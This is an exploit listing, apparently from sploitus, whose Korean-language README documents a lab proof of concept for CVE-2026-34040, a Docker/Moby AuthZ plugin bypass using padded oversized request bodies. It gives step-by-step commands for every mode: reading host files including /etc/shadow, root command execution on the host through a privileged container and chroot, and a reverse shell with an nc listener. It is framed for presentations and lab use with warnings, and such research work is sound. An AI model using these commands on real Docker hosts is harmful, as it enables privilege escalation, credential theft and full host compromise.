Exploit for Authentication Bypass Using an Alternate Path or Channel in Mobyproject Moby CVE-2026-34040

## https://sploitus.com/exploit?id=AF683167-D0EB-5BC5-AFCD-7CFEED7715C2
# CVE-2026-34040 Full Lab PoC

> Docker/Moby AuthZ Plugin Bypass via oversized request body  
> 발표/실습용 전체 재현 프로젝트입니다.

## What this project demonstrates

이 프로젝트는 CVE-2026-34040의 핵심 흐름을 실습 환경에서 재현합니다.

```text
1. 정상 크기 요청은 AuthZ 플러그인에 의해 차단된다.
2. 1MB를 초과하는 padding이 포함된 요청은 AuthZ 검사 경로를 우회할 수 있다.
3. 우회가 성공하면 원래 막혀야 할 privileged container 생성 요청이 Docker Daemon 처리 단계까지 도달한다.
4. 이후 privileged container + host bind mount 조합으로 호스트 파일 읽기와 호스트 명령 실행을 데모할 수 있다.
```

이 취약점 자체가 직접 `/etc/shadow`를 읽거나 RCE를 실행하는 것은 아닙니다.  
정확히는 **AuthZ 플러그인이 막아야 할 Docker API 요청을 우회해서 특권 컨테이너를 만들 수 있게 되는 취약점**입니다.  
그 이후의 파일 읽기, chroot, 명령 실행은 Docker/Linux의 기존 기능을 악용하는 영향 데모입니다.

## Repository structure

```text
.
├── README.md
├── poc.py
├── requirements.txt
├── .gitignore
├── LICENSE
└── docs
    ├── lab-setup.md
    ├── impact-modes.md
    ├── demo-script.md
    ├── troubleshooting.md
    └── publication-notes.md
```

## Modes

`poc.py`는 모드별로 동작을 분리했습니다.

| Mode | Purpose |
|---|---|
| `check` | 정상 요청과 1MB 초과 요청을 비교해서 AuthZ 우회 여부만 확인 |
| `read-host-file` | privileged container + host bind mount로 호스트 파일 읽기 데모 |
| `rce-proof` | 호스트에서 root 권한으로 명령이 실행됐음을 marker file로 증명 |
| `host-command` | 허가된 랩에서 지정한 명령을 chroot 기반으로 호스트에서 실행 |
| `shell-container` | `sleep infinity` 컨테이너를 만들고 `docker exec + chroot` 데모용으로 유지 |
| `reverse-shell-local` | 동일 VM/로컬 랩에서만 쓰는 reverse shell 데모 |

## Requirements

```text
- Ubuntu VM or Linux host
- Docker/Moby vulnerable version
- Docker AuthZ plugin enabled
- Access to /var/run/docker.sock
- alpine image available locally
```

Alpine 이미지가 없으면 우회 요청이 `404 No such image`로 실패할 수 있습니다.  
이 경우에도 `403`이 아니라는 점은 AuthZ 검사 단계를 지나 Docker Daemon 처리 단계까지 도달했다는 증거가 될 수 있습니다.  
발표에서는 혼동을 줄이기 위해 미리 pull 해두는 것을 권장합니다.

```bash
sudo docker pull alpine
```

## Usage

### 1. Basic AuthZ bypass check

```bash
sudo python3 poc.py --mode check
```

Expected vulnerable-like behavior:

```text
small request     → HTTP 403
oversized request → HTTP 201 or HTTP 404
```

### 2. Read a host file

기본값은 `/etc/hostname`입니다.

```bash
sudo python3 poc.py --mode read-host-file
```

다른 파일을 지정할 수도 있습니다.

```bash
sudo python3 poc.py --mode read-host-file --host-file /etc/passwd
```

발표에서 강한 임팩트를 주려면 `/etc/shadow`를 사용할 수 있지만, 공개 저장소/공개 발표 자료에는 민감 파일 출력값을 그대로 넣지 않는 것을 권장합니다.

```bash
sudo python3 poc.py --mode read-host-file --host-file /etc/shadow
```

### 3. RCE proof without a reverse shell

호스트의 `/tmp/cve_2026_34040_rce_proof` 파일에 `id`, `hostname`, `whoami` 결과를 기록합니다.

```bash
sudo python3 poc.py --mode rce-proof
```

확인:

```bash
cat /tmp/cve_2026_34040_rce_proof
```

정리:

```bash
sudo rm -f /tmp/cve_2026_34040_rce_proof
```

### 4. Run a host command in the lab

명시적 확인 플래그가 필요합니다.

```bash
sudo python3 poc.py \
  --mode host-command \
  --cmd "id; hostname; whoami" \
  --i-understand-this-runs-on-host
```

### 5. Keep a privileged container alive and chroot manually

```bash
sudo python3 poc.py --mode shell-container --keep
```

출력되는 컨테이너 ID로 다음을 실행합니다.

```bash
sudo docker exec -it  /bin/sh
chroot /host /bin/bash
id
hostname
whoami
```

정리:

```bash
sudo docker rm -f 
```

### 6. Local reverse shell demo

이 모드는 같은 VM 내부에서 시연하기 위한 로컬 reverse shell입니다.  
`NetworkMode=host`를 사용하므로 Linux 실습 환경에서 실행하세요.

터미널 1:

```bash
nc -lvnp 4444
```

터미널 2:

```bash
sudo python3 poc.py \
  --mode reverse-shell-local \
  --lport 4444 \
  --i-understand-this-runs-on-host
```

정리:

```bash
sudo docker ps -a
sudo docker rm -f 
```

## Important lab-only warning

이 프로젝트는 본인 소유 또는 명시적으로 허가받은 랩 환경에서만 사용하세요.  
원격 Docker API, 제3자 서버, 운영 환경, 인터넷 노출 Docker endpoint를 대상으로 실행하지 마세요.

## Why not hide the impact demos?

발표 목적이라면 단순히 `403`과 `404/201`만 보여주는 것보다, 우회 이후 어떤 영향이 가능한지 보여줘야 CVE의 위험도가 전달됩니다.  
그래서 이 full-lab 버전에는 호스트 파일 읽기, chroot 기반 명령 실행, 로컬 reverse shell 데모를 다시 포함했습니다.

다만 기본 모드는 여전히 `check`입니다.  
위험도가 높은 동작은 사용자가 명시적으로 mode를 선택해야만 실행됩니다.